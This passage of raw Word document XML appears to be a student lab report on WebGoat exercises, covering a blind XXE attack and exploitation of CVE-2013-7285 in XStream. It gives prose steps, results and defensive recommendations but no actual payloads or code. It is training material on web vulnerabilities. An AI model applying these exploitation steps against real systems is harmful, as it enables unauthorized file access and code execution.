        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Vulnerabilities Discovered: Successfully exploited a blind XXE vulnerability in WebGoat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DCEC1" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained: Obtained access to the contents of the specified file on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367181BA" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes: Illustrates the risk of blind XXE attacks, where the attacker does not receive direct responses but can infer information based on the server's behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A50BB" w14:textId="77777777" w:rsidR="00556801" w:rsidRDefault="00556801" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8A9E94" w14:textId="6D35AC92" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF25DB8" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise highlights the potential severity of blind XXE attacks, emphasizing the need for thorough input validation and secure coding practices. Such vulnerabilities can lead to unauthorized data access, posing a significant risk in real-world scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20024066" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116D59C1" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B190CA5" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B06CD03" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement input validation and sanitization to prevent blind XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3D956" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Regularly update and patch XML parsers and related components to address known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE58BA2" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Conduct thorough security assessments to identify and mitigate blind XXE risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302ACC6D" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F12DC3" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The exercise provided insights into the stealthy nature of blind XXE attacks and the importance of adopting a comprehensive security posture. In future assessments, a more in-depth analysis of XML parsing mechanisms and input validation would be crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63758C92" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9EAB1C" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517247D" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DFCF04" w14:textId="605F1F1F" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebWolf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project Documentation: </w:t>
      </w:r>
      <w:r w:rsidR="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C158CD2" w14:textId="4462672C" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser Development Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C808E4" w14:textId="523BA1D8" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CD15D6" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC602D6" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3267E0E4" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561E6FB2" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C07493F" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37430DA1" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0839595A" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097E3A24" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E687646" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E659A5D" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC0B6F7" w14:textId="17B6BEC9" w:rsidR="00403A14" w:rsidRDefault="00403A14" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403A14">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A6 Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C0CE2" w14:textId="77777777" w:rsidR="00A32BE5" w:rsidRDefault="00A32BE5" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702B18FF" w14:textId="02C40EE5" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise Title: </w:t>
      </w:r>
      <w:r w:rsidR="002F049A" w:rsidRPr="002F049A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exploit is not always in “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F049A" w:rsidRPr="002F049A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Your”code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A32BE5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exploiting CVE-2013-7285 (XStream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406ACF98" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CAAD5B4" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D55247" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The objective of this exercise is to understand and demonstrate the exploitation of a known vulnerability, specifically CVE-2013-7285, affecting XStream, a Java library for serialization. The exercise aims to illustrate the potential risks associated with insecure deserialization and the impact it can have on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2393F" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601AFC5A" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FFA11" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise employs a targeted approach to exploit the XStream vulnerability using crafted payloads. Tools such as Python scripts and XStream payloads will be utilized to demonstrate the exploitation. The methodology involves manipulating serialized data to execute arbitrary code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45390AD5" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3861711C" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D0FF3" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A998968" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Identify the Target System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F395A75" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Select a target system with a vulnerable version of XStream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06502821" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Craft Exploitative Payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C202393" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Develop payloads to exploit the CVE-2013-7285 vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080190FA" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Leverage knowledge of the XStream vulnerability to create payloads that trigger arbitrary code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2380BE" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Execute the Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500EBC29" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Deliver the crafted payload to the target system using a chosen delivery method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60554124" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Capture Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0F086" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Document critical steps with screenshots to visually illustrate the exploitation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08147B" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Address Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D067752" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Identify and address any challenges encountered during payload crafting or execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C46F4" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DAC108" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2C00D5" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Vulnerabilities Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0528DCAD" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Successfully exploited the CVE-2013-7285 vulnerability in XStream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA67E8A" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5135A0" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Demonstrated the ability to execute arbitrary code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82E528" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E2BE9" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Uncovered additional attack surface or potential vectors during the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E077790" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
